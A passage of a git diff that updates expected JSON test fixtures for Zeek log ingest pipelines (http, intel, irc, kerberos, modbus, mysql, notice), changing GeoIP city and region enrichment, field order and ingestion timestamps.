"1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -350,28 +360,6 @@ }, "session_id": "CxhRTwkHNRsHxBw34" }, - "source": { - "port": 55378, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:WGP7lVikdNxSruwUqKr9UJsM6cg=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:15:55.599Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -386,8 +374,13 @@ "status_code": 301 } }, + "source": { + "port": 55378, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993433500Z", + "ingested": "2021-12-14T14:59:13.505268533Z", "original": "{\"ts\":1617081355.599548,\"uid\":\"CxhRTwkHNRsHxBw34\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55378,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.1\",\"request_body_len\":0,\"response_body_len\":191,\"status_code\":301,\"status_msg\":\"Moved Permanently\",\"tags\":[],\"resp_fuids\":[\"FVGTq31RBgKGE02hx7\"],\"resp_mime_types\":[\"text/html\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -402,20 +395,37 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:WGP7lVikdNxSruwUqKr9UJsM6cg=", + "transport": "tcp" } }, { + "@timestamp": "2021-03-30T05:16:00.171Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -442,28 +452,6 @@ }, "session_id": "CrI5Xg30caNXnNvEse" }, - "source": { - "port": 41960, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:/5C96eJFQOtyIA58kKSJqNHqFag=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:16:00.171Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -478,8 +466,13 @@ "status_code": 200 } }, + "source": { + "port": 41960, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993439400Z", + "ingested": "2021-12-14T14:59:13.505268935Z", "original": "{\"ts\":1617081360.171904,\"uid\":\"CrI5Xg30caNXnNvEse\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41960,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F8vozz46VoxeAmqLv3\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -494,20 +487,37 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:/5C96eJFQOtyIA58kKSJqNHqFag=", + "transport": "tcp" } }, { + "@timestamp": "2021-03-30T05:16:04.250Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -534,28 +544,6 @@ }, "session_id": "C6oCGd24yB2dZ7y7z7" }, - "source": { - "port": 42164, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:BZ8++u2MIGSTzB1PMApm+Z7ySCw=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:16:04.250Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -570,8 +558,13 @@ "status_code": 200 } }, + "source": { + "port": 42164, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993445300Z", + "ingested": "2021-12-14T14:59:13.505269315Z", "original": "{\"ts\":1617081364.250251,\"uid\":\"C6oCGd24yB2dZ7y7z7\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42164,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F1imAq4yUjbwyK7NO2\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -586,20 +579,37 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:BZ8++u2MIGSTzB1PMApm+Z7ySCw=", + "transport": "tcp" } }, { + "@timestamp": "2021-03-30T05:16:06.285Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -626,28 +636,6 @@ }, "session_id": "C7DWRE1zsvxUK9RyW1" }, - "source": { - "port": 42292, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:ajUcq0AI8azqE0a1li4/jRMwcKw=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:16:06.285Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -662,8 +650,13 @@ "status_code": 200 } }, + "source": { + "port": 42292, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993451200Z", + "ingested": "2021-12-14T14:59:13.505269690Z", "original": "{\"ts\":1617081366.285075,\"uid\":\"C7DWRE1zsvxUK9RyW1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42292,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FQhm6z1cISaOxMzzR6\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -678,6 +671,13 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:ajUcq0AI8azqE0a1li4/jRMwcKw=", + "transport": "tcp" } }, { @@ -689,14 +689,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -769,7 +769,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:01.993457100Z", + "ingested": "2021-12-14T14:59:13.505270153Z", "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json index a51a678157a..aa3f703054d 100644 --- a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json +++ b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json @@ -14,14 +14,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -57,7 +57,7 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-12-09T13:51:03.233040Z", + "ingested": "2021-12-14T14:59:14.764628555Z", "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "enrichment", @@ -74,22 +74,35 @@ ] }, { + "@timestamp": "2019-11-06T09:03:00.989Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.1.1", + "89.160.20.156" + ] + }, "log": { "file": { "path": "/usr/local/var/log/zeek/intel.log" } }, + "host": { + "name": "Lees-MBP.localdomain" + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -124,24 +137,8 @@ "address": "192.168.1.1", "ip": "192.168.1.1" }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2019-11-06T09:03:00.989Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.1.1", - "89.160.20.156" - ] - }, - "host": { - "name": "Lees-MBP.localdomain" - }, "event": { - "ingested": "2021-12-09T13:51:03.233049400Z", + "ingested": "2021-12-14T14:59:14.764631321Z", "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "enrichment", @@ -152,7 +149,10 @@ "type": [ "indicator" ] - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json index 21d6fe1ad5a..4e436885535 100644 --- a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json +++ b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json @@ -14,14 +14,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -48,7 +48,7 @@ "ip": "10.180.156.249" }, "event": { - "ingested": "2021-12-09T13:51:03.580323700Z", + "ingested": "2021-12-14T14:59:15.317358074Z", "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"command\":\"USER\",\"value\":\"xxxxx\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -73,17 +73,30 @@ } }, { + "@timestamp": "2013-12-20T15:44:10.647Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "xxxxx" + ], + "ip": [ + "10.180.156.249", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -109,29 +122,8 @@ "address": "10.180.156.249", "ip": "10.180.156.249" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "irc", - "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", - "transport": "tcp" - }, - "@timestamp": "2013-12-20T15:44:10.647Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "xxxxx" - ], - "ip": [ - "10.180.156.249", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:03.580332Z", + "ingested": "2021-12-14T14:59:15.317360396Z", "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"user\":\"xxxxx\",\"command\":\"NICK\",\"value\":\"molochtest\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -148,20 +140,41 @@ }, "user": { "name": "xxxxx" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "irc", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", + "transport": "tcp" } }, { + "@timestamp": "2013-12-20T15:44:10.706Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "xxxxx" + ], + "ip": [ + "10.180.156.249", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -188,29 +201,8 @@ "address": "10.180.156.249", "ip": "10.180.156.249" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "irc", - "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", - "transport": "tcp" - }, - "@timestamp": "2013-12-20T15:44:10.706Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "xxxxx" - ], - "ip": [ - "10.180.156.249", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:03.580337700Z", + "ingested": "2021-12-14T14:59:15.317360873Z", "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -227,6 +219,14 @@ }, "user": { "name": "xxxxx" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "irc", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", + "transport": "tcp" } }, { @@ -238,14 +238,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -297,7 +297,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:03.580343100Z", + "ingested": "2021-12-14T14:59:15.317361261Z", "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json index c88fababaac..f5115a35edd 100644 --- a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json +++ b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json @@ -86,7 +86,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:04.150192Z", + "ingested": "2021-12-14T14:59:15.886676516Z", "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -201,7 +201,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:04.150196600Z", + "ingested": "2021-12-14T14:59:15.886679156Z", "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json b/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json index 75a6af9f1ea..e8c46617ee2 100644 --- a/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json +++ b/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json @@ -28,7 +28,7 @@ "ip": "192.168.1.10" }, "event": { - "ingested": "2021-12-09T13:51:04.835055300Z", + "ingested": "2021-12-14T14:59:16.556760321Z", "original": "{\"ts\":1352718265.222457,\"uid\":\"CpIIXl4DFGswmjH2bl\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":64342,\"id.resp_h\":\"192.168.1.164\",\"id.resp_p\":502,\"func\":\"READ_COILS\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -96,7 +96,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:04.835060100Z", + "ingested": "2021-12-14T14:59:16.556763150Z", "original": "{\"ts\":1352718265.222457,\"uid\":\"CpIIXl4DFGswmjH2bl\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":64342,\"id.resp_h\":\"192.168.1.164\",\"id.resp_p\":502,\"func\":\"READ_COILS\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json b/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json index 5c5b27bc714..b279f9757da 100644 --- a/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json +++ b/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json @@ -30,7 +30,7 @@ "ip": "192.168.0.254" }, "event": { - "ingested": "2021-12-09T13:51:05.144926100Z", + "ingested": "2021-12-14T14:59:16.914011008Z", "original": "{\"ts\":1216281087.437392,\"uid\":\"C5Hol527kLMUw36hj3\",\"id.orig_h\":\"192.168.0.254\",\"id.orig_p\":56162,\"id.resp_h\":\"192.168.0.254\",\"id.resp_p\":3306,\"cmd\":\"query\",\"arg\":\"select count(*) from foo\",\"success\":true,\"rows\":1}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -102,7 +102,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:05.144933200Z", + "ingested": "2021-12-14T14:59:16.914013623Z", "original": "{\"ts\":1216281087.437392,\"uid\":\"C5Hol527kLMUw36hj3\",\"id.orig_h\":\"192.168.0.254\",\"id.orig_p\":56162,\"id.resp_h\":\"192.168.0.254\",\"id.resp_p\":3306,\"cmd\":\"query\",\"arg\":\"select count(*) from foo\",\"success\":true,\"rows\":1}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json index 491f17eabb2..21588b8c1f5 100644 --- a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json +++ b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json @@ -32,7 +32,7 @@ "ip": "172.16.238.1" }, "event": { - "ingested": "2021-12-09T13:51:05.490792100Z", + "ingested": "2021-12-14T14:59:17.264456746Z", "original": "{\"ts\":1320435875.879278,\"note\":\"SSH::Password_Guessing\",\"msg\":\"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).\",\"sub\":\"Sampled servers: 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136\",\"src\":\"172.16.238.1\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" @@ -61,14 +61,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -100,14 +100,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -120,7 +120,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:05.490800300Z", + "ingested": "2021-12-14T14:59:17.264458920Z", "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" @@ -156,7 +156,7 @@ "description": "The capture loss script detected an estimated loss rate above 88.306%" }, "event": { - "ingested": "2021-12-09T13:51:05.490806100Z", + "ingested": "2021-12-14T14:59:17.264459402Z", "original": "{\"ts\":1617097740.958466,\"note\":\"CaptureLoss::Too_Much_Loss\",\"msg\":\"The capture loss script detected an estimated loss rate above 88.306%\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", "category": [ "intrusion_detection" @@ -172,17 +172,27 @@ ] }, { + "@timestamp": "2021-03-30T09:52:09.601Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -218,25 +228,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Dff30r1qWk7lVgWVwXvU4AAuxU8=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T09:52:09.601Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:05.490811700Z", + "ingested": "2021-12-14T14:59:17.264459785Z", "original": "{\"ts\":1617097929.601155,\"uid\":\"CmvrSS1wIiuOGYCbfi\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":48818,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"fuid\":\"F39b0Bdfm3FW1rNS5\",\"proto\":\"tcp\",\"note\":\"SSL::Invalid_Server_Cert\",\"msg\":\"SSL certificate validation failed with (self signed certificate)\",\"sub\":\"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US\",\"src\":\"10.156.0.2\",\"dst\":\"89.160.20.156\",\"p\":443,\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -247,6 +240,13 @@ "type": [ "info" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Dff30r1qWk7lVgWVwXvU4AAuxU8=", + "transport": "tcp" } }, { @@ -258,14 +258,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -297,14 +297,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -332,7 +332,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:05.490817200Z", + "ingested": "2021-12-14T14:59:17.264460130Z", "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 